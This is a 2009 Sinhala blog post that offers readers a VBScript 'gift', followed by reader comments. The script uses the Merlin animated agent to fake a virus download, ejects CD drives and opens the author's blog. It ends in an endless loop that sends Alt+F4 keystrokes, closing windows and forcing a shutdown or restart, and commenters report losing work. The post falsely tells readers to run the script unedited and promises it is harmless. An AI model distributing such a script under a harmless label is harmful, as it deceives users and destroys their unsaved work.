තෑගි...තෑගි...තෑගි...තෑගි...තෑගි...

කෂ්ටියට ලගදි මුකුත් තෑග්ගක් එහෙම නොදුන්න නිසා තරහ වෙලාද මන්ද?ආ කමක් නෑ මේ තෑග්ග අරන් බලන්නකෝ හොදද නරකද කියලා...;)

මේකත් VB Script තෑග්ගක් තමයි.:)) ‍හෆොයි මුණේ හිනාව.බලන්න අසාවේ බෑ.හා හා කමක් නෑ.මේකේ කෝඩ් එක ටිකක් දිගයි.දිග වගේම තමා වැඩෙත්.කරලම බලන්න ඕනී.හැබැයි සංස්කරණය නොකරම වැඩේ බැලුවනම් තමයි හොද.බය වෙන්න එපා ඔයාලගේ කෙම්පුටර් වලට හානියක් වෙන්නෑ කියල වෙනදා වගේම පොරොන්දු වෙනවා.එහෙම දේවල් අපි කවදාවත් ඔයාලට දෙන්නෑනේ.:D

වෙනදා වගේම ඔය vb script එක Notepad වලට copy කරලා save කරනකොට කැමති නමක් එහෙමත් දීලා extention එක විදිහට ".vbs" කියල දෙන්නකෝ.දැන් ඉතින් බලන් ඉන්නැතිව ඉක්මනට ඒ file එක Run කරල බලන්නකෝ.

අනේ ඔන්න හොදද නරකද කියලා කියන්න අමතක කරන්නේපා.

ඔන්න එහෙනම් කෝඩ් එක....


StrAgentName2 = "MERLIN"
StrAgentPath2 = "C:\Windows\Msagent\Chars\" & strAgentName2 & ".Acs"
Set objAgent2 = CreateObject("Agent.Control.2")
ObjAgent2.Connected = TRUE
ObjAgent2.Characters.Load strAgentName2, strAgentPath2
Set objPeter = objAgent2.Characters.Character(strAgentName2)
ObjPeter.MoveTo 700,300
ObjPeter.Show
ObjPeter.Play "GetAttention"
ObjPeter.Play "GetAttentionReturn"
ObjPeter.Speak("Hi I'm HASITHA HEMARATHNE...Here to take control of your computer")
Wscript.Sleep 1000
Set objAction= objPeter.Hide
Do While objPeter.Visible = True
Wscript.Sleep 250
Loop
Wscript.Sleep 100
On Error Resume Next
StrAgentName2 = "MERLIN"
StrAgentPath2 = "C:\Windows\Msagent\Chars\" & strAgentName2 & ".Acs"
Set objAgent2 = CreateObject("Agent.Control.2")
ObjAgent2.Connected = TRUE
ObjAgent2.Characters.Load strAgentName2, strAgentPath2
Set objPeter = objAgent2.Characters.Character(strAgentName2)
ObjPeter.MoveTo 700,300
ObjPeter.Show
ObjPeter.Play "GetAttention"
ObjPeter.Play "GetAttentionReturn"
ObjPeter.Speak("Now I'm Downloading virus . . . 20% . . . 40% . . . 60% . . . 80% . . . 100% virus downloaded")
Wscript.Sleep 1000
Set objAction= objPeter.Hide
Do While objPeter.Visible = True
Wscript.Sleep 250
Loop
Wscript.Sleep 100
On Error Resume Next
StrAgentName2 = "MERLIN"
StrAgentPath2 = "C:\Windows\Msagent\Chars\" & strAgentName2 & ".Acs"
Set objAgent2 = CreateObject("Agent.Control.2")
ObjAgent2.Connected = TRUE
ObjAgent2.Characters.Load strAgentName2, strAgentPath2
Set objPeter = objAgent2.Characters.Character(strAgentName2)
ObjPeter.MoveTo 700,300
ObjPeter.Show
ObjPeter.Play "GetAttention"
ObjPeter.Play "GetAttentionReturn"
ObjPeter.Speak("Hmmmmm watch as I open your CD drive")
Wscript.Sleep 1000
Set objAction= objPeter.Hide
Do While objPeter.Visible = True
Wscript.Sleep 250
Loop
Wscript.Sleep 100
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.CdromCollection
If colCDROMs.Count >= 1 then
For I = 0 to colCDROMs.Count - 1
ColCDROMs.Item(I).Eject
Next ' cdrom
End If
Wscript.Sleep 100
On Error Resume Next
StrAgentName2 = "MERLIN"
StrAgentPath2 = "C:\Windows\Msagent\Chars\" & strAgentName2 & ".Acs"
Set objAgent2 = CreateObject("Agent.Control.2")
ObjAgent2.Connected = TRUE
ObjAgent2.Characters.Load strAgentName2, strAgentPath2
Set objPeter = objAgent2.Characters.Character(strAgentName2)
ObjPeter.MoveTo 700,300
ObjPeter.Show
ObjPeter.Play "GetAttention"
ObjPeter.Play "GetAttentionReturn"
ObjPeter.Speak("Buwahaaaa I now open internet explorer")
Wscript.Sleep 1000
Set objAction= objPeter.Hide
Do While objPeter.Visible = True
Wscript.Sleep 250
Loop
Wscript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "iexplore http://www.hasithalk.blogspot.com", 9
WScript.Sleep 10000 ' Give ie some time to load
'Close the browser
WshShell.SendKeys "%F"
WshShell.SendKeys "C"
Wscript.Sleep 100
On Error Resume Next
StrAgentName2 = "MERLIN"
StrAgentPath2 = "C:\Windows\Msagent\Chars\" & strAgentName2 & ".Acs"
Set objAgent2 = CreateObject("Agent.Control.2")
ObjAgent2.Connected = TRUE
ObjAgent2.Characters.Load strAgentName2, strAgentPath2
Set objPeter = objAgent2.Characters.Character(strAgentName2)
ObjPeter.MoveTo 700,300
ObjPeter.Show
ObjPeter.Play "GetAttention"
ObjPeter.Play "GetAttentionReturn"
ObjPeter.Speak("Hoh hoh hooooh now I will RESTART your computer")
Wscript.Sleep 1000
Set objAction= objPeter.Hide
Do While objPeter.Visible = True
Wscript.Sleep 250
Loop
Do
Wscript.Sleep 100
WshShell.SendKeys "%{F4}"
Wscript.Sleep 100
Wshshell.Sendkeys "are"
Loop



කොහොමද හොදද??? :-O



5 comments:

බුදු අම්මෝ නවත්ත ගත්තේ බොහොම අමාරුවෙන්
මේ අර රීස්ටාර්ට් වෙනවයි කියන්නේ ඇත්තටමද

May 31, 2009 at 5:53 PM  
අනූ said...

හෆොයි මට නම් මේක කොරන්න බයයි වගේ.. කලිං පාර නවත්තගත්තේ හරි අමාරුවෙං

May 31, 2009 at 8:21 PM  
Deeps said...

බොහොම ස්තුතියි. මේවාගෙන් ජොලියක් ගන්නවා වගේම ඉගෙන ගන්නත් ගොඩාක් දේවල් තියනවා

May 31, 2009 at 8:43 PM  

@ අනූ
අපෝ බයවෙන්නෙපා ටිකක් වෙලා බලන් හිටියම ඉබේම නවතියි.වැඩිය දෙයක් වෙන්නෑ, pc එක රීස්ටාර්ට් වෙයි.එතකොට ඉතිං කොහොමත් නවතිනවනේ....

May 31, 2009 at 9:00 PM  
Thameera said...

අනේ මගෙ මැෂින් එක රීස්ටාට් වෙලා කර කර හිටපු ඩවුන්ලෝඩුත් නැවතිලා හරි ප්‍රශ්නයක් වුණේ..... :'-(
මේ මැෂිම රීස්ටාට් වෙන්න යන වෙලාව දන්නවනම්....

කමක් නෑ, අළුත් අත්දැකීමක්... බොහොම ස්තුතියි!

June 1, 2009 at 2:52 PM  

Post a Comment

කුණුහරුප නැතිව ඕනි දෙයක් ලියලා යන්න...!!!
ඕනි දෙයක් අපි සතුටින් බාරගන්නවා...
කෝකටත් දාපු කමෙන්ට් එක මම බලලම බ්ලොග් එකට දාන්නම්කෝ.තරහ වෙන්නෙපා.එහෙම කරන්නේ කාගෙත් හොදටනේ....

Google PageRank එක බලාගන්න මෙතනින්.....

ආරම්භය 05/04/2009
සියළුම හිමිකම් ඇවිරිණි.
අයිතිය HASI BOY CRAETIONS සතුය.